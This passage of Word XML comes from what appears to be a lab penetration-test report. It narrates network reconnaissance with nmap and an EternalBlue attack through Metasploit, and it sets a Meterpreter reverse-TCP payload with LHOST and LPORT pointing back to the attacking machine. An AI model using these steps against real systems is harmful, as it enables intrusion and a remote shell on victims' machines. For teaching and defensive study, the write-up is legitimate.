        <w:t xml:space="preserve"> Shown in </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C" w:rsidRPr="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DE1D2" w14:textId="447D144C" w:rsidR="008E1713" w:rsidRDefault="008E1713" w:rsidP="008E1713">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B142A2E" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00CC1A6D" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55429459" wp14:editId="5FBA7BEB">
            <wp:extent cx="3204845" cy="1478671"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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04845" cy="1478671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC3B8B" w14:textId="7645D9FC" w:rsidR="008E1713" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Ifconfig Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB71B3" w14:textId="490C6E30" w:rsidR="008E1713" w:rsidRDefault="008E1713" w:rsidP="008E1713">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The IP address of the local attacking machine was identified as </w:t>
      </w:r>
      <w:r w:rsidR="00CC1A6D">
        <w:t>192.168.0.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="00723443">
        <w:t>gateway</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was identified as </w:t>
      </w:r>
      <w:r w:rsidR="00CC1A6D">
        <w:t>192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the subnet mask was identified as 255.255.255.0 can be shortened to /24 within Variable Length Subnet Masking (VLSM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CE26B" w14:textId="77777777" w:rsidR="008E1713" w:rsidRDefault="008E1713" w:rsidP="008E1713">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AF13E1" w14:textId="082AB873" w:rsidR="00723443" w:rsidRDefault="009F7D88" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The industry standard information gathering tool ‘Nmap’ was utilised for this stage of the attack issuing the </w:t>
      </w:r>
      <w:r w:rsidR="0052187D">
        <w:t>syntax [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052187D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052187D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1713" w:rsidRPr="008E1713">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1713" w:rsidRPr="008E1713">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1713" w:rsidRPr="008E1713">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1713">
        <w:t xml:space="preserve"> -O</w:t>
      </w:r>
      <w:r w:rsidR="008E1713" w:rsidRPr="008E1713">
        <w:t xml:space="preserve"> 192.168.0.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00723443">
        <w:t>] was performed above within the Kali Linux terminal Command Line Interface (CLI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F6EEC" w14:textId="77777777" w:rsidR="00723443" w:rsidRDefault="00723443" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED638D6" w14:textId="41B9986F" w:rsidR="009F7D88" w:rsidRDefault="00723443" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidR="0052187D">
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052187D" w:rsidRPr="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0052187D" w:rsidRPr="0052187D">
        <w:t xml:space="preserve">statement was issued to initialise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052187D" w:rsidRPr="0052187D">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052187D" w:rsidRPr="0052187D">
        <w:t xml:space="preserve"> as a privileged</w:t>
      </w:r>
      <w:r w:rsidR="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Superuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="0052187D" w:rsidRPr="0052187D">
        <w:t>(Administrator),</w:t>
      </w:r>
      <w:r w:rsidR="0052187D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="008E1713" w:rsidRPr="00723443">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1713" w:rsidRPr="00723443">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED4E82">
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tells </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to perform a Transport Control Protocol (TCP) (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SYNchronisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) SYN packet scan against all commonly used open ports within the subnet address and the -O </w:t>
      </w:r>
      <w:r w:rsidR="00ED4E82">
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was utilised to fingerprint the OS that is being used by the devices attached to the LAN along with the subnet address identified from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00723443">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CLI command. </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:t xml:space="preserve">Shown in </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C" w:rsidRPr="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C68D8" w14:textId="77777777" w:rsidR="00CC1A6D" w:rsidRDefault="00CC1A6D" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459699B7" w14:textId="29124ECE" w:rsidR="009F7D88" w:rsidRDefault="009F7D88" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771AA123" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00CC1A6D" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368CE474" wp14:editId="418A103F">
            <wp:extent cx="3204845" cy="345186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4845" cy="3451860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C71690" w14:textId="5184C825" w:rsidR="00670FF6" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Nmap Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA1EF6" w14:textId="77777777" w:rsidR="00CC1A6D" w:rsidRDefault="00CC1A6D" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3587B4F7" w14:textId="353984D6" w:rsidR="0083115E" w:rsidRDefault="009F7D88" w:rsidP="0083115E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Once the target was identified as vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="008E1713">
        <w:t>map’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the IP address </w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00CC1A6D">
        <w:t>192.168.0.45</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">had been </w:t>
      </w:r>
      <w:r w:rsidR="00CC1A6D">
        <w:t>gathered</w:t>
      </w:r>
      <w:r>
        <w:t>, the tool ‘Metasploit’ was utilised to execute the ‘Eternal Blue’ exploit</w:t>
      </w:r>
      <w:r w:rsidR="0083115E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0083115E" w:rsidRPr="0083115E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0083115E">
        <w:t>Metasploit contains thousands of exploit tools written in ‘Ruby’ code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A371A" w14:textId="6C2A957B" w:rsidR="0083115E" w:rsidRDefault="0083115E" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4250DDBA" w14:textId="39C4D09C" w:rsidR="009F7D88" w:rsidRDefault="0083115E" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To start the Metasploit tool the command syntax [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC1A6D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC1A6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] was executed from the Kali Linux CLI</w:t>
      </w:r>
      <w:r w:rsidR="009F7D88">
        <w:t xml:space="preserve"> shown in </w:t>
      </w:r>
      <w:r w:rsidR="009F7D88" w:rsidRPr="009F7D88">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009F7D88" w:rsidRPr="009F7D88">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F7D88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97383E" w14:textId="77777777" w:rsidR="009F7D88" w:rsidRDefault="009F7D88" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CDDB89" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00CC1A6D" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0110FDF1" wp14:editId="592A8AEB">
            <wp:extent cx="3204845" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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4845" cy="3235325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1D51D" w14:textId="1B65E69A" w:rsidR="009F7D88" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve">SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Metasploit Splash screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12106417" w14:textId="034B1F58" w:rsidR="00EC662B" w:rsidRDefault="009F7D88" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilising </w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t>the Metasploit CLI syntax [</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6" w:rsidRPr="00670FF6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00C95E0B" w:rsidRPr="00C95E0B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C95E0B" w:rsidRPr="00C95E0B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95E0B" w:rsidRPr="00C95E0B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t>], the ‘Eternal Blue’ exploitation code was loaded into the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF572D4" w14:textId="2BCB412B" w:rsidR="00670FF6" w:rsidRDefault="00670FF6" w:rsidP="00437C65">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A13E11" w14:textId="5905A51C" w:rsidR="00670FF6" w:rsidRDefault="00670FF6" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The command; [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00670FF6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>how options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was then issued to get a list of options that need to be set within the module in order to run the exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00291CB4">
        <w:t xml:space="preserve"> Shown in </w:t>
      </w:r>
      <w:r w:rsidR="00291CB4" w:rsidRPr="00291CB4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CE08C" w14:textId="77777777" w:rsidR="00670FF6" w:rsidRDefault="00670FF6" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486FFC8C" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00291CB4" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D69B3C1" wp14:editId="074AE665">
            <wp:extent cx="3204845" cy="831850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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51083"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3204845" cy="831850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310D770" w14:textId="1828B274" w:rsidR="007C7085" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Show Options Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00602E6F" w14:textId="77777777" w:rsidR="00CC1A6D" w:rsidRDefault="00CC1A6D" w:rsidP="00571C3F"/>
    <w:p w14:paraId="3D70380B" w14:textId="0BEEEB4C" w:rsidR="00670FF6" w:rsidRDefault="00670FF6" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00CE58D8">
        <w:t>Remote Port (</w:t>
      </w:r>
      <w:r>
        <w:t>RPORT</w:t>
      </w:r>
      <w:r w:rsidR="00CE58D8">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="00571C3F">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:t>to 445 by default because this is the vulnerable port the exploit was designed to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594D376" w14:textId="1F48A9BF" w:rsidR="00CE58D8" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A4C640" w14:textId="3FFF2CC6" w:rsidR="00CE58D8" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Remote Host (RHOST) was set to the identified targets IP address from the information gathering stage of the attack using the command syntax </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE58D8">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[SET RHOST 192.168.0.</w:t>
      </w:r>
      <w:r w:rsidR="00291CB4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE58D8">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48BFD8" w14:textId="4592CA42" w:rsidR="00CE58D8" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6158CB6C" w14:textId="77777777" w:rsidR="0052187D" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next stage of the attack is attaching a reverse TCP payload to the exploit to inject into the target machine that will communicate back with the local attacking machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC9707" w14:textId="77777777" w:rsidR="0052187D" w:rsidRDefault="0052187D" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64887CA9" w14:textId="7825B9A1" w:rsidR="0052187D" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This was achieved by issuing the command syntax within the ‘Eternal Blue’ exploit screen</w:t>
      </w:r>
      <w:r w:rsidR="00752C6D">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F3C70" w14:textId="77777777" w:rsidR="007C7085" w:rsidRDefault="007C7085" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6623B7" w14:textId="5015847D" w:rsidR="00CE58D8" w:rsidRPr="0052187D" w:rsidRDefault="00752C6D" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00752C6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[SET PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00752C6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00752C6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00752C6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00752C6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6D1DB" w14:textId="77777777" w:rsidR="0052187D" w:rsidRDefault="0052187D" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7FC85C" w14:textId="5AE7127E" w:rsidR="00CE58D8" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Local Port (LPORT) was set to 4444 because this is outside of the range of commonly used port</w:t>
      </w:r>
      <w:r w:rsidR="0052187D">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so no port bindings would be present. The LPORT was set using the command syntax [SET LPORT  4444].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD47C8" w14:textId="1177C5F6" w:rsidR="0052187D" w:rsidRDefault="0052187D" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF21D0C" w14:textId="757ED4B4" w:rsidR="0052187D" w:rsidRDefault="0052187D" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Local Host (LHOST) was set to the local </w:t>
      </w:r>
      <w:r w:rsidR="00A63A10">
        <w:t xml:space="preserve">IP address of the attacking machine that was gathered from the </w:t>
      </w:r>
      <w:r w:rsidR="00A63A10" w:rsidRPr="00A63A10">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidR="00A63A10">
        <w:t xml:space="preserve"> command within the information gathering stage of the attack. The LHOST was set using the command syntax [SET LHOST 192.168.0</w:t>
      </w:r>
      <w:r w:rsidR="00291CB4">
        <w:t>.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F508E0B" w14:textId="110E203F" w:rsidR="00CE58D8" w:rsidRDefault="00CE58D8" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
